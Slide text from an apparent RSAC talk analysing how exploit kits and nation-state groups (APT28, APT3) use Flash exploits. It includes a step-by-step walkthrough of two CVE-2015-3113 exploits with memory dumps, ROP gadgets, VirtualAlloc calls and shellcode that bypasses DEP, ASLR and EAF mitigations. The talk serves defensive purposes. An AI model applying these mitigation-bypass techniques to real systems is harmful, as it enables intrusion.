How nation-states and criminal syndicates use exploits to bypass security

SESSION ID:SESSION ID:
#RSAC
Mark Loman
How Nation-States and Criminal
Syndicates Use Exploits to Bypass
Security
SPO3-T11
Director, Engineering
SOPHOS
@markloman

#RSAC
Vulnerabilities by Year
2
A vulnerability is a weakness in an application or the system that could
provide attackers with a way to bypass security
894 1020
1677
2156
1526
2450
4935
6610 6520
5632 5736
4651
4155
5297 5191
7946
6452 6435
0
1000
2000
3000
4000
5000
6000
7000
8000
9000
Vulnerabilities
1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016
(source: cvedetails.com)

#RSAC
Exploits
3
An exploit tries to turn a vulnerability (a weakness) into a way to
breach a system
Exploits are not malware
Exploits allow attackers to execute arbitrary code (malicious code)

#RSAC
Code Execution
4
3
191
103
64
10
75
466
66
19
14
363
519
113
0 100 200 300 400 500 600
Oracle Java (JRE)
Mozilla Firefox
Microsoft Windows 7
Microsoft Windows 10
Microsoft Silverlight
Microsoft Office
Microsoft Internet Explorer
Microsoft Edge
Linux Kernel
Google Chrome
Apple macOS
Adobe Flash Player
Adobe Acrobat Reader
New vulnerabilities that can lead to local or remote code execution (2014-2016)
(source: cvedetails.com)

#RSAC
Exploit Usage
5
Cybercriminals
Large-scale malware distribution
— Exploit Kits (web, malvertising)
Nation State Actors
Targeted (Covert) Attacks
— Spear Phishing (documents)
— Watering Holes (web)
Security Professionals
Exploit Frameworks for Penetration Testing

#RSAC
Exploit Kits 2016
For Large-scale Malware Distribution

#RSAC
Exploit Kits (2016)
7
Angler Defunct, shut down in June 2016 w/ arrest of Lure gang
Magnitude
Neutrino Defunct, not seen since September 2016
Neutrino-v (VIP)
Nuclear Defunct, not seen since April 2016
RIG, RIG-E
Sundown
Bizarro Sundown

#RSAC
Exploit Kits (2016)
8
1H2016
Angler Nuclear Neutrino
Magnitude RIG Other
2H2016
RIG Neutrino Other

#RSAC
Exploits in Kits (Jan 2017)
9
Magnitude
Neutrino-v
RIG, RIG-E
Sundown
Bizarro Sundown
CVE-2016-0189CVE-2016-4117
CVE-2016-0189
CVE-2013-2551
CVE-2015-2419
CVE-2016-0189
CVE-2016-0189
CVE-2016-7200
CVE-2016-4117 CVE-2016-1019 CVE-2015-8651
CVE-2016-7201
CVE-2015-8651 CVE-2015-5122
CVE-2016-4117 CVE-2015-5119
CVE-2016-7200 CVE-2016-7201
CVE-2016-4117 CVE-2015-5119
CVE-2016-0034
Edge
Silverlight
Windows LPE (Godmode)
Flash
CVE-2014-6332
CVE-2014-6332
Internet Explorer

#RSAC
Nation State Actors
Fancy Bear (APT28)
Also known as Pawn Storm, Sofacy Group, Sednit, Tsar Team and
STRONTIUM

#RSAC
APT28
11
Consistent use of Russian language in malware
Malware compile times correspond with business hours of Russia’s
major cities, including Moscow and St. Petersburg
Collects intelligence most useful to government
i.e. no theft of intellectual properties for economic gain

#RSAC
APT28 Targets
12
German parliament (2014)
French television hack (April 2015)
White House, NATO (August 2015)
Dutch Safety Board and Bellingcat (October 2015) #MH17
World Anti-Doping Agency (August 2016)
US Democratic National Committee (2016) #Trump
Ukrainian Artillery (2014 – present)

#RSAC
2016
Zero-Day Exploits Used by APT28
13
APR MAY JUN JUL AUG SEP OCT NOV DEC APR MAY JUN JUL AUG SEP OCTJAN FEB MARMAR
CVE-2015-1701
CVE-2015-3043
CVE-2015-2590
CVE-2015-4902
CVE-2015-2424
CVE-2015-7645
CVE-2016-7255
CVE-2016-7855
Flash
Windows LPE Flash
Java
Java click-to-play bypass
Office
2015
Flash
Windows LPECVE-2016-1019*Flash
* Also ended up in Exploit Kits of cybercriminals
CVE-2016-4117 Flash*
CVE-2015-5119 Flash*
Hacking Team
Russian Doll

#RSAC
CVE-2015-5119 Hacking Team
14
Exploit developed
in 2013
Comes with attack
for Apple Macs

#RSAC
Nation State Actor
Buckeye (APT3)
Also known as Pirpi, UPS, Gothic Panda, TG-0110

#RSAC
Zero-Day Exploits Used by APT3
16
FEB MAR APR MAY JUN AUG SEP OCT NOVJAN
2015
CVE-2015-5119*Flash
Hacking Team
* Also ended up in Exploit Kits of cybercriminals
CVE-2015-3113*Flash
2014
JUN JUL AUG SEP OCT NOV DECMAR APR MAY
Clandestine Wolf
CVE-2014-1776
Clandestine Fox
Flash*
CVE-2014-6332
Windows LPE*
(Godmode)
Double Tap
CVE-2014-4113Windows LPE

#RSAC
APT3 vs Angler EK
How a Nation-State and Cybercriminals Abused CVE-2015-3113

#RSAC
Commonalities APT3 and Angler EK
18
Heap-based buffer overflow in Adobe Flash Player 18.0.0.160
Flash Video File (.FLV) exploits flaw in Nellymoser audio codec by
exceeding maximum length
Uses corrupted vector to read/write outside intended boundaries
Sets size of another vector to a huge value, used to read/write the
entire virtual memory
Bypasses ASLR (Address Space Layout Randomization)
Creates ROP chain to bypass DEP (Data Execution Prevention)

#RSAC
Angler EK CVE-2015-3113
19
0857c000 0857c040 6cbf0736 cccccccc cccccccc
0857c010 cccccccc cccccccc cccccccc cccccccc
0857c040 6ca9f992 cccccccc 6cab4745 6cac4788
0857c050 6cc334a6 6d096dd9 08578000 00008000
0857c060 00001000 00000040 0857c06c 0005e860
0857c070 89610000 90c35dfc fce58955 00e8ec81
Pointer to fake VTable (attacker-controlled, crafted on the heap)
PLACE SHELLCODE
ON THE HEAP
MANIPULATE
VTABLE
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE
Gadget to
pivot stack
Gadgets to
bypass DEP Gadget to
start shellcode

#RSAC
20
0857c050 6cc334a6 6d096dd9 08578000 00008000
0857c060 00001000 00000040 0857c06c 0005e860
0857c070 89610000 90c35dfc fce58955 00e8ec81
Invoke method from fake VTable (called from Flash ActionScript)
PLACE SHELLCODE
ON THE HEAP
MANIPULATE
VTABLE
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE
6cbf0736 8b01 mov eax,dword ptr [ecx]
6cbf0738 51 push ecx
6cbf0739 ff5008 call dword ptr [eax+8] ; call sound.toString() at VTable +8

#RSAC
21
0857c050 6cc334a6 6d096dd9 08578000 00008000
0857c060 00001000 00000040 0857c06c 0005e860
0857c070 89610000 90c35dfc fce58955 00e8ec81
sound.toString() address is hijacked (overwritten)
PLACE SHELLCODE
ON THE HEAP
MANIPULATE
VTABLE
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE
6cab4745 94 xchg eax,esp ; <- stack pivot!
6cab4746 c3 ret

#RSAC
22
0857c050 6cc334a6 6d096dd9 08578000 00008000
0857c060 00001000 00000040 0857c06c 0005e860
0857c070 89610000 90c35dfc fce58955 00e8ec81
ROP chain starts, executes first ROP gadget
PLACE SHELLCODE
ON THE HEAP
MANIPULATE
VTABLE
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE
6ca9f992 83c408 add esp,8
6ca9f995 c3 ret

#RSAC
23
0857c050 6cc334a6 6d096dd9 08578000 00008000
0857c060 00001000 00000040 0857c06c 0005e860
0857c070 89610000 90c35dfc fce58955 00e8ec81
Set shellcode to PAGE_EXECUTE_READWRITE
PLACE SHELLCODE
ON THE HEAP
MANIPULATE
VTABLE
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE
6d096dd9 // call Kernel32!VirtualAlloc(0x8578000, 0x8000, 0x1000, 0x40)

#RSAC
APT3 CVE-2015-3113
24
this.customClassInstance.theMethod(_loc32_, _loc32_, _loc32_,
_loc32_, _loc32_, _loc32_, _loc32_, _loc32_, _loc32_, _loc32_,
_loc33_, _loc19_, _loc34_, 65536, 4096, 64, _loc32_, _loc32_,
_loc19_ + 6,_loc19_ + 6, _loc30_, _loc19_ + 6, _loc25_, _loc25_);
Custom object with method that takes large number of parameters
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE

#RSAC
APT3 CVE-2015-3113
25
Hijacked using ROP gadget that displaces esp to start of ROP chain
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE
6d4b33dd 83c448 add esp,48h
6d4b33e0 c3 ret

#RSAC
APT3 CVE-2015-3113
26
ret instruction triggers start of the ROP chain
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE
6d4b33dd 83c448 add esp,48h
6d4b33e0 c3 ret

#RSAC
APT3 CVE-2015-3113
27
02fae6ac 6cebb68b 6cebb68b 6cebb68b 6cebb68b
6cebb68b 6cebb68b 6cebb68b 6cebb68b
02fae6ec 6cebb68b 6cebb68b 6cebb68b 6cebb68b
02fae72c 6cebb68b 6cebb68b 6cebb68b 6cebb68b
6cebb68b 6cebb68b 6cebb68a 1f140100
02fae76c 6d4b6da1 1f140000 00010000 00001000
00000040 6cebb68b 6cebb68b 6cebb68b
6cebb68b 6cebb68b 6d4b6da7 6d4b6da7
02fae7ac 6cebaff0 6d4b6da7 6cec1b5f 6cec1b5f
Gadgets to
bypass DEP
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE
Gadgets to
bypass security
Gadget to
start shellcode

#RSAC
APT3 CVE-2015-3113
28
02fae76c 6d4b6da1 1f140000 00010000 00001000
6d4b6da1 ff159c45606c call dword ptr [Flash32_18_0_0_160!AdobeCPGetAPI+0x35f82c]
6d4b6da7 c3 ret
6cebb68a 58 pop eax
6ba8b68b c3 ret
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE

#RSAC
APT3 CVE-2015-3113
29
02fae76c 6d4b6da1 1f140000 00010000 00001000
6cebafea e871256500 call Flash32_18_0_0_160!IAEModule_IAEKernel_UnloadModule+0x198300
6cebafef 59 pop ecx
6cebaff0 59 pop ecx ; pop call-preceded gadget (6d4b6da7) into ecx
6cebaff1 c3 ret
6d4b6da1 ff159c45606c call Kernel32!VirtualAlloc(0x1f140000, 0x10000, 0x1000, 0x40)
6d4b6da7 c3 ret
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE

#RSAC
APT3 CVE-2015-3113
30
02fae76c 6d4b6da1 1f140000 00010000 00001000
6cec1b59 e8a2bcffff call Flash32_18_0_0_160+0xd800
6cec1b5e 83ff20 cmp edi,20h
6cec1b61 7504 jne Flash32_18_0_0_160+0x11b67
6cec1b5f ff20 jmp dword ptr [eax] ; eax contains shellcode address (1f140000)
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE

#RSAC
APT3 CVE-2015-3113
31
1f140210 nop
...
1f140217 mov eax,1F140008h
1f14021c nop
...
1f14021f mov ebx, offset IEShims!xxx_GetProcAddress (70ed9f14)
1f140224 mov dword ptr [eax],ebx ; store address at 1f140008h
1f140226 nop
1f140227 nop
1f140228 push 0
1f14022a push 74657874h
1f14022f push 6E6F4364h ; ASCII 'SetThreadContext'
1f140234 push 61657268h
1f140239 push 54746553h
1f14023e push esp
1f14023f push (KERNEL32+0x0) (75e40000) ; BaseAddress kernel32.dll
1f140244 call ebx ; find kernel32!SetThreadContext via GetProcAddress
0:005> dd eax
1f140000 1f140210 00000008 057c3000 057c0140
1f140010 1f13f000 00000000 1f711000 00000000
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE

#RSAC
APT3 CVE-2015-3113
32
1f140210 nop
...
1f140217 mov eax,1F140008h
1f14021c nop
...
1f14021f mov ebx, offset IEShims!xxx_GetProcAddress (70ed9f14)
1f140224 mov dword ptr [eax],ebx ; store address at 1f140008h
1f140226 nop
1f140227 nop
1f140228 push 0
1f14022a push 74657874h
1f14022f push 6E6F4364h ; ASCII 'SetThreadContext'
1f140234 push 61657268h
1f140239 push 54746553h
1f14023e push esp
1f14023f push (KERNEL32+0x0) (75e40000) ; BaseAddress kernel32.dll
1f140244 call ebx ; find kernel32!SetThreadContext via GetProcAddress
PLACE SHELLCODE
ON THE HEAP
CREATE CUSTOM
OBJECT
GAIN CONTROL OVER
PROGRAM FLOW
START
ROP CHAIN
SET EXECUTION BITS
TO SHELLCODE MEMORY
START
SHELLCODE

#RSAC
Conclusion
33
1 vulnerability, 2 very different exploit attacks
Angler EK (Cybercriminals)
 ROP chain on the heap
 Employs Stack Pivot exploit
technique to start ROP chain
APT3 (Nation-State Actor)
 ROP chain on the stack
no Stack Pivot necessary
 Critical ROP gadgets are call-preceded
within a 6 byte range
bypasses stack-based ROP mitigations
 Stores base address of kernel32.dll,
GetProcAddress, SetThreadContext
bypasses EAF/EAF+ mitigations

#RSAC
Software (stack) based ROP mitigations
34
No historic and no reliable stack data (e.g. call-preceded gadgets)
01101101 01110010 00101110 00100000 01110010 01101111 01100010 01101111 01110100
00100000 01110111 01100001 01110011 00100000 01101000 01100101 01110010 01100101
time
Application
System DLL
Kernel
Processor
API call (e.g. VirtualAlloc)

#RSAC
Hardware Augmented Control-Flow Integrity
35
Obtains reliable history (repurposes unused feature in Intel® CPUs)
01101101 01110010 00101110 00100000 01110010 01101111 01100010 01101111 01110100
00100000 01110111 01100001 01110011 00100000 01101000 01100101 01110010 01100101
time
Application
System DLL
Kernel
Processor
API call (e.g. VirtualAlloc)

#RSAC
36
Callee Type AllocateVirtualMemory
0x1F140000 (65536 bytes)
Branch Trace Opcode To
----------------------------------- -------- -----------------------------------
0x6CEBB68B Flash32_18_0_0_160.ocx ~ RET* 0x6D4B6DA1 Flash32_18_0_0_160.ocx
ff159c45986f CALL DWORD [0x6c60459c]
c3 RET
0x6CEBB68B Flash32_18_0_0_160.ocx ~ RET* 0x6CEBB68A Flash32_18_0_0_160.ocx
58 POP EAX
c3 RET
0x6CEBB68B Flash32_18_0_0_160.ocx ~ RET* 0x6EE0B68B Flash32_18_0_0_160.ocx
c3 RET
...
Leveraging hardware Branch Tracing and Branch Misprediction

#RSAC
37
Callee Type AllocateVirtualMemory
0x1F140000 (65536 bytes)
Branch Trace Opcode To
----------------------------------- -------- -----------------------------------
0x6CEBB68B Flash32_18_0_0_160.ocx ~ RET* 0x6D4B6DA1 Flash32_18_0_0_160.ocx
ff159c45986f CALL DWORD [0x6c60459c]
c3 RET
0x6CEBB68B Flash32_18_0_0_160.ocx ~ RET* 0x6CEBB68A Flash32_18_0_0_160.ocx
58 POP EAX
c3 RET
0x6CEBB68B Flash32_18_0_0_160.ocx ~ RET* 0x6EE0B68B Flash32_18_0_0_160.ocx
c3 RET
...
6c086da1 ff159c45606c call Kernel32!VirtualAlloc(0x1f140000, 0x10000, 0x1000, 0x40)
6c086da7 c3 ret
Leveraging hardware Branch Tracing and Branch Misprediction

#RSAC
Comparing HA-CFI and Control Flow Guard
38
Control-Flow Integrity
 Stops ROP attacks as a whole
(fine-grained analysis on coarse-grain trigger)
 Works with any modern Intel® CPU
(processors from 2008 and newer)
 Can be applied to existing applications
(no recompilation or application update needed)
 Operating System agnostic and
compatible with CFG
(supports Windows XP and up)
Control Flow Guard (CFG)
 Stops calls to an unexpected memory
location (it’s not a ROP mitigation)
(prevents VTable hijacking)
 Requires developers to enable CFG,
re-compile & distribute updates for
their applications
 Requires CFG-aware Operating System
(only Windows 8.1 Update 3 and Windows 10)

#RSAC
Angler EK Evading EMET
Angler EK (March 2016) vs EMET (November 2016)
http://arstechnica.com/security/2016/06/drive-by-exploits-pushing-
ransomware-now-able-to-bypass-microsoft-emet/

#RSAC
40
{Todo}

#RSAC
41
{Todo}

#RSAC
Conclusion
42
Attackers can leverage even old vulnerabilities by (re-)weaponizing
their exploits to evade today’s signature-less security tools
Examples show that both nation-states and criminal syndicates are
capable of evading exploitation defenses:
Memory mitigations like DEP and ASLR
Code mitigations like EAF/EAF+, Stack Pivot, Caller, SimExecFlow, etc.
More advanced exploit prevention technology is a real-world necessity

#RSAC
Applying knowledge
43
Next week you should:
Inventorize vulnerable and unused applications, plugins and End-of-Life software
Consider using an Advanced Exploit Prevention solution for endpoints to intercept attacks on both
existing and unknown vulnerabilities (zero-days)
In the first three months following this presentation you should:
Determine if most exploited applications and plugins are required for business
Update, replace or remove vulnerable applications, plugins and End-of-Life software
Plan deployment of Advanced Exploit Prevention solution
Within six months you should:
Ensure or verify automatic updating of applications and plugins
Deploy Advanced Exploit Prevention solution on endpoints

How nation-states and criminal syndicates use exploits to bypass security

Recommended

Recommended

More Related Content

Similar to How nation-states and criminal syndicates use exploits to bypass security

Similar to How nation-states and criminal syndicates use exploits to bypass security (20)

More from Priyanka Aash

More from Priyanka Aash (20)

Recently uploaded

Recently uploaded (20)

How nation-states and criminal syndicates use exploits to bypass security